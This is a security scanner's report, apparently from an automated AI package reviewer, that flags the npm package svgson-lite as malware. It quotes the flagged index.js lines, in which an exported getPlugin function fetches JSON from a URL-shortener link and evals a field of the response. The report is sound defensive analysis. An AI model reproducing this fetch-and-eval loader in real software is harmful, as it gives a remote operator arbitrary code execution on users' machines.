AI Security Review
scanned 12d ago · by lpm-firewall-aiThe package exposes a runtime function that downloads remote JSON and evals a field as JavaScript. This creates user-triggered remote code execution from a URL shortener endpoint in the main package entrypoint.
Static reason
High-risk behavior combination matched malicious policy.
Trigger
Application imports the package main entrypoint and calls the exported default getPlugin function.
Impact
Arbitrary code execution in the consuming Node.js runtime with the app's privileges if getPlugin is called.
Mechanism
remote fetch followed by eval of response-controlled code
Attack narrative
A consumer installing svgson-lite gets an SVG utility module whose main entrypoint also exports getPlugin. When called, getPlugin contacts https://shorturl.at/147uq, expects JSON, and evals data.model. The URL shortener hides the payload source and lets the publisher or endpoint operator change executed code after publication.
Rationale
Source inspection confirms a reachable exported function in index.js fetches remote content and evals it, which is not package-aligned for a zero-dependency SVG helper. Although there is no install-time execution, the user-invoked exported RCE path is concrete malicious behavior.
Evidence
index.jspackage.json
Network endpoints1
shorturl.at/147uq
Decision evidence
public snapshotAI called this Malicious at 96.0% confidence as Malware with low false-positive risk.
Evidence for block
- index.js defines getPlugin() that fetches https://shorturl.at/147uq and parses JSON.
- index.js executes remote response field data.model with eval(data.model).
- getPlugin is exported in the default export from main entrypoint index.js.
- Remote code execution is unrelated to SVG helper functions and hidden behind plugin-like name.
Evidence against
- package.json has no install/preinstall/postinstall lifecycle hooks.
- Remote fetch/eval is not invoked automatically at import time; activation requires calling default.getPlugin().
- No local credential/file harvesting, persistence, or destructive filesystem code observed in package source.
Behavioral surface
ChildProcessEvalNetwork
UrlStrings
Source & flagged code
3 flagged · loading sourceindex.jsView file
82function getPlugin() {
L83: fetch("https://shorturl.at/147uq")
L84: .then((response) => response.json())
L85: .then((data) => {
L86: eval(data.model);
L87: })
Critical
Remote Asset Decode Execute
Source fetches a remote non-code asset, decodes its contents, and dynamically executes the decoded payload.
index.jsView on unpkg · L82•Trigger-reachable chain: manifest.main -> index.js
Reachable file contains a blocking source-risk pattern.
Critical
Trigger Reachable Dangerous Capability
A package entrypoint or install-time lifecycle script reaches a source file with blocking dangerous behavior.
index.jsView on unpkg85.then((data) => {
L86: eval(data.model);
L87: })
High
Findings
2 Critical2 High2 Medium2 Low
CriticalRemote Asset Decode Executeindex.js
CriticalTrigger Reachable Dangerous Capabilityindex.js
HighChild Process
HighEvalindex.js
MediumNetwork
MediumStructural Risk Force Deep Review
LowScripts Present
LowUrl Strings